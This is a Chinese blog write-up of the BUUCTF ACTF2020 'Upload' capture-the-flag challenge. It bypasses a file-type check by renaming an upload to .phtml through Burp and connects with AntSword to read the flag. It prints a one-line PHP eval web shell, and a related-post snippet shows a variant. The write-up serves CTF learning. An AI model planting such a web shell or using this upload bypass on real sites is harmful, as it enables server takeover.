BUUCTF:[ACTF2020 新生赛]Upload

最新推荐文章于 2024-05-29 23:11:19 发布
最新推荐文章于 2024-05-29 23:11:19 发布
阅读量378 收藏 2
点赞数 4
分类专栏: CTF_web 文章标签: web ctf BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62995661/article/details/137202676
版权
本文描述了通过发现靶机的upload漏洞,如何上传PHP文件并通过Brup抓包修改文件格式,最终利用中国蚁剑连接终端获取flag的过程。作者展示了从漏洞利用到成功渗透的关键步骤。
摘要由CSDN通过智能技术生成

题目

  • 打开靶机
    找到文件上传的灯泡
  • 猜测是一个upload文件上传漏洞,那么我们的基本思路就是:上传一个php文件,phtml文件,在去用中国蚁剑来连接终端,查看里面的flag
  • 查看页面的checkfile函数
    checkflie
  • 我们直接上传文件只能采用.jpg|.png|.gif格式
  • 我们需要去Brup抓包,然后修改文件格式,在发送包
  • 首先写一个webshell.txt
<?php @eval($_POST['shell']);?>
  • 后缀修改为jpg,上传文件
    jpg
  • Brup抓包,修改为phtml,在发送包
    (这里试过php,会显示bad file)
    bad file
  • 修改为phtml,就好了!
    phtml
  • 并且得到了文件上传的地址
  • 中国蚁剑测试连接
    连接成功
  • 打开虚拟终端,寻找flag
flag{20a7f9e5-e489-4f91-840d-0fb7155bd2a7}

flag

爱学习的小孩啦
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Jeopardy-Writeups:SniperOJ的CTF挑战比
05-18
SniperOJ的挑战文章和源代码描述平台...─ pwn│ ├── pwn100-bof-x86-64│ ├── pwn100-shellcode-x86-64│ ├── pwn150-static-x86-64│ ├── pwn200-actf-run-circles│ ├── pwn200-shorter-shellc
潞安矿区高河井田构造样式探讨
06-24
高河井田位于沁水块坳东南部,主要含煤地层包括二叠系下统山西组和石炭系上统太原组,构造要素走向总体为近SN—NNE向。通过对高河井田构造的系统分析,划分了两大类三亚类主要构造样式,并结合实例分析了各种构造样式对...
Buuctf [ACTF2020 新生]Upload
Dexret的博客
12-07 542
打开该靶机,发现为一个上传图片的网页 尝试上传一个php文件 发现该网页有前端验证,尝试上传.htaccess和ini文件都被拦截 上传一个png文件,利用BurpSuite修改后缀为php,无法上传成功 应该还有个后端验证,那么这道题应该和极客大挑战那个差不多,多了个前端验证 上传一句话木马,将其后缀名改为png进行上传 在上传过程中利用BurpSuite进行抓包 修改后缀名为phmtl 修改后上传,能够上传成功 连接一下上传文件路径 验证该路径存在后,利用..
BUUCTF [ACTF2020 新生]Upload
CrotZZ的博客
07-12 276
先上传一句话木马试试 看到前端进行了过滤 检查下页面元素 onsubmit 事件会在表单中的确认按钮被点击时发生。CheckFile检查某文件是否含相关代码内容 这里将其删去在传文件试试 可以上传成功,但后端也有过滤,不过这个过滤没之前题目那么多(如极客大挑战2019的Upload),改个后缀为phtml就可以登录,极客大挑战2019Upload上传的文件也能用 用蚁剑加上上面的路径,进行连接 找到flag ...
[ACTF新生2020]Splendid_MineCraft
最新发布
2302_79135465的博客
05-29 287
v3 取最左边字符ACTF{xxxx ,v17是从第六个字符开始取四个字符,v18是从第十字符开始取两个字符,得到 ACTF{xxx_xxx_xxx} ,flag 26位。发现这是一个循环,循环次数151h,[esi+edi+1Fh]内容和72h异或。把输入给cl,cl又赋给bl,ecx=edi(循环次数 i ) + 0x83 ,然后就是ebx^ecx结果存到ebx。好像就是 bl=data[ flag[i]^(0x83+i) ] 这个,把 data 找到就差不多了。进入call dword。
CTF中的BUUCTF之[ACTF2020 新生]Upload
weixin_44632787的博客
06-17 492
CTF中的BUUCTF之[ACTF2020 新生]Upload 启动我们的挑战项目 好吧,不管怎么看都是文件上传类型的题目。那么我们就用我经常用的一句话木马吧: GIF89a? <script language="php">eval($_POST['zyh']);</script> 然后将上面的内容改成1.png。 然后上传我们的1.png(别忘记了要打开BurpSuite来进行抓包)。将BurpSuite抓到的包发送到Repeater模块 然后把文件名1.png改成1.
BUUCTF-[ACTF2020 新生]Upload1
Monica的博客
09-22 1597
目录 题目: 分析: 题目: 打开之后啥也没有,鼠标放在中间的灯上面发现有文件上传的地方,猜测是一个文件上传漏洞 分析: 先随便上传一个文件,发现提示 并且bp抓包并没有抓到包,说明为前端检测过滤。 那就上传jpg,png,gif这三种类型的文件,然后bp抓包在修改后缀为php。 先上传一个jpg文件,内容为<?php phpinfo();?>。 发现后端还是进行了检查过滤 那就试试其他几种后缀: 绕过后缀的有文件格式有php,php3,php...
BUUCTF-Web-[ACTF2020新生]Upload
m0_61851859的博客
03-27 390
4.打开burpsuite进行抓包,修改为php文件类型并将数据包发送回去,发现上传失败。5. 考虑是不是网站对php后缀进行过滤,采取黑名单绕过修改文件后缀为.phtml,上传成功。3.将文件后缀名修改为.jpg类型上传文件,上传成功。(但此时文件有错木马无法连接)1.打开题目在小灯泡那发现了文件上传,因此猜测存在文件上传漏洞。2.尝试上传一句话木马,上传失败仅允许上传弹窗提示的文件类型。7.连接成功并找到flag。6.使用蚁剑进行连接。
matlab的90个实例.rar_actf8x_matlab基础知识的90个实例
09-24
MATLAB(Matrix Laboratory)是一种强大的数学计算软件,广泛应用于工程计算、数据分析、算法开发和图形化界面构建等领域。本资源“matlab的90个实例.rar”提供了MATLAB的基础知识,通过90个实例帮助初学者掌握其...
PPJEmailPicker:UITextField替换以选择多个电子邮件
05-16
(PPJEmailPicker *) createAutoCompleteFieldWithFrame:( CGRect )frame{PPJEmailPicker * actf = [[PPJEmailPicker alloc ] initWithFrame: frame];actf. pickerDelegate = self;actf. possibleStrings = [...
NTFS文件系统分析
09-19
NTFS文件系统分析,比较详细的介绍,各个元文件的定义,偏移
BUUCTF-Web- [ACTF2020 新生]Upload
weixin_67813445的博客
03-14 130
本题考察文件上传前端校验以及.phtml的用法
BUUCTF-Web[ACTF2020 新生]Upload
rumil的博客
06-24 2197
尝试修改后缀为:php1,php2, php3, php4, php5, phps, pht, phtm, phtml。经过测试和验证,当后缀为.phtml时上传成功的同时语句能被解析,可通过蚁剑连接。这次告诉我们这是一个有害的文件,无法正常上传,说明后端也做了过滤,我们尝试绕过。访问成功,验证是否可执行php语句,能被解析。连接成功,添加,并进入到文件目录,找flag。同理图片码也无法进行解析,上传无效。浏览器搜about:config。修改文件后缀,上传成功但无法解析。回到靶机界面,刷新后,再次上传。
[ACTF2020 新生]Upload--BUUCTF
XiaoYeZhu_1314的博客
04-24 385
得到:Upload Success!第二步:使用bp抓上传jpg文件的包,在修改文件后缀名为phtml。第一步:上传php文件,他提示,只能上传jpg、png、gif。第四步:拼接访问,连接蚁剑,找到flag。第三步:进行放过,在访问浏览器。
buuctf-web-[ACTF2020 新生]Upload1
mlws1900的博客
08-03 285
或者查看源代码,可以找到上传的地方。随机点一下,发现了可以点亮这个灯。可以上传jpg,但是没法解析。抓包修改后缀名phtml上传。咋flag都喜欢放根目录。
[ACTF2020 新生]Upload
夜幕下的灯火阑珊的博客
05-11 3037
知识点 php别名绕过 随意上传一个aa.jpg文件,抓包,修改后缀名,写马 后缀名一直尝试到phtml后上传成功 使用蚁剑连接 双击进入后台 在根目录下找到flag
buu web:[ACTF2020 新生]Upload
m0_55378150的博客
04-10 848
打开靶机,发现是一个文件上传窗口 老规矩,先上传一句话木马 发现有白名单,所以我们试一下先将.php后缀改成.jpg,再用burp抓包给他改回来(就是看一下它是不是前端验证) 发送 左上角有报错,看来没这么简单,试一下上一道题的phtml后缀方法 放包 成功上传,并且给出了路径,直接上蚁剑 成功! ...
[actf2020 新生]include
03-16
好的,我理解您的请求是让我用中文回答您的问题,那么以下是关于 "actf2020 新生" 和 "include" 的回答: "actf2020 新生" 是指 2020 年举行的一项针对新生的网络安全竞。该比旨在通过一系列的挑战来测试...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值